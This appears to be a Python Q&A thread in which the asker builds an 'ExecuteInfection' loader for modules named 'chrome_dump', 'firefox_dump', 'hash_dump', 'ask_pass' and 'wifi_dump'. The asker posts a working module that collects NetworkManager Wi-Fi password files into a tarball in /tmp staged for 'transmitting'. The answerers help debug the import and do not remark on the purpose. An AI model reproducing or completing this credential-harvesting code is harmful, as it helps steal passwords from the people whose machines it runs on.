# Creating a class to import a script and run the script from that class

Tags: python, python-2.7, import

First let me explain what I'm trying to do, I want to create a class that will import a file from a certain directory (if the file exists), and run the file as a script. For example:

```
class RunScript(object):

    def __init(self, script):
        if script in someListThatContainsScriptNamesProbablyJSONFile:
            self.script = # do something fancy and import the script

    def run_exec(self):
        # do something and execute the script maybe subprocess?
```

So my question would be, how can I successfully run the script from this class? I don't really want to use subprocess because I think it might look a bit messy, is there another way I can do this? If not it's completely fine ot use subprocessing.

What I've tried so far:

```
 import os


__all__ = [
    "ask_pass", "chrome_dump", "firefox_dump",
    "hash_dump", "wifi_dump"
]
script_path = "{}/opts/infection_opt/{}"


class ExecuteInfection(object):

    @staticmethod
    def __fix_filename(filename):
        if ".py" in filename:
            ext_index = filename.index(".")
            return filename[ext_index:-1]

    def __init__(self, script):
        if ExecuteInfection(script).__fix_filename(script) in __all__:
            self.script = __import__(script_path.format(os.getcwd(), script))
        else:
            raise ImportError("{} is not a valid infection operation script.".format(script))
```

However when this is run, I get an error saying:

```
if ExecuteInfection(script).__fix_filename(script) in __all__:
    RuntimeError: maximum recursion depth exceeded
```

---

*In reference to comments and answer, here is one of the scripts I would be importing*

```
import os
import tarfile
import string
import random


def _find_config_files(path="/etc/NetworkManager/system-connections"):
    """
      Find the configuration files that contain the Wifi passwords

      > :param path: path to the configuration files
      > :return: True and the files or False and None if nothing found

      Example:
        >>> _find_config_files()
        (True, set(['AgE1a2', 'AISNetwork2', 'BBB1ffC9ce', 'AISNetwork1']))

    """
    found_files = set()
    if os.path.exists(path):
        for item in os.listdir(path):
            found_files.add(os.path.join(path, item))
        return True, found_files
    return False, None


def _make_tar(status, _file_start="nm_log_{}.tar.gz", tmp_dir="/tmp/{}"):
    """
      Create a tar file and store it in the temp directory for processing
      and transmitting

      > :param status: the status and the files found
      > :param _file_start: the start of the name of the tar file
      > :param tmp_dir: path to the temp directory to be formatted
      > :return: full path to the created filename or None
    """

    def __rand_filename(_start, ints=string.digits, length=4):
        """
          Create a random filename for the tarfile

          > :param _start: start of the filename
          > :param ints: the acceptable numbers to be used
          > :param length: the length of the filename
          > :return: a random filename

          Example
            >>> _make_tar((True, set(["test.txt"]))).__rand_filename(_file_start)
            nm_log_4768.tar.gz
        """
        _finalize = [random.choice(ints) for _ in range(length)]
        return _start.format(''.join(_finalize))

    filename = __rand_filename(_file_start)
    file_path = tmp_dir.format(filename)

    if status[0]:
        with tarfile.open(file_path, "w:gz") as tar:
            for f in status[1]:
                tar.add(f)

        return file_path
    else:
        print(
            "no tarball could be created, it appears that no files could be found "
            "assuming that the files don't exist and this person has no idea what "
            "the internet is, get out now."
        )  # todo:/ change to log
        return None


def main():
    """ main function of the script """
    data_found = _find_config_files()
    filename = _make_tar(data_found)
    if filename is not None:
        return filename


if __name__ == "__main__":
    main()
```

Comment: Are the script you try to import self-made ? It looks to me like the issue would rather be within those script : the usage of "dumb" makes me think you are trying to delete stuff, which you might be doing recursively. 

Is there a way for it to be more than 999 recursion steps ? As the error message says, there is a limit in python.

Comment: In other words, it would be nice to see the imported script that raise this error, if you have it.

Comment: @Alceste_ hey sorry for the delayed response I can go ahead and post one of the scripts I'm importing. One second

Answer (score 0):

As I already said in the comment, the problem seems to lie within the script that you are importing rather than your importing algorithm. 
(*When a python script is imported, it is executed, so if you have things that aren't class or functions within the script, and those things fail, the error message might be pointing at your import without it being the issue.*

However, it could also be something else (really crazy file structure with huge amount of imports that force the import module to go through hundreds of calls, for instance), so it would help to see what the script you are importing does (and you can double-check imports within that, some implementation of python might not be blocking recursive imports of the same module).

With those information, one could provide you with better insight on what is happening (this is an answer because I needed some length, but I hope you'll allow me to edit it with something better than simple recommendations on how to find the problem, like an actual solution).

You said you don't want to use sub-processes, but you might want to try if the issue still happens if you don't try to import the script directly. Try:

1. Reading the file as text, then use the  [compile function](https://docs.python.org/2/library/py_compile.html) to generate a byte-code you will then be able to execute with something along the lines of exec (but don't let that be in your final implementation unless you just generated the script yourself from the code, or users could modify it...)
2. using system with a command along the lines of `python full/path/to/script` as parameters. (http://docs.python.org/library/os.html#os.system)

Thanks for your return on those, hope it'll help you to find the issue.

Comment: I added one of the scripts to the question, I hope that helps. The scripts don't really do any importing other then from the built in packages, which I think shouldn't really be an issue. I think that a system call would make the code look kinda bad, but it's always worth a shot. Thank you for the answer and the ideas

Comment: Given the code you gave us, I can't seem to find a reason why there would be a recursion issue on the file import. . .

Did you try the other things and did they work ? They might indeed be considered to be bad code by some, but they are of great use when trying to determine where the issue is more accurately. :P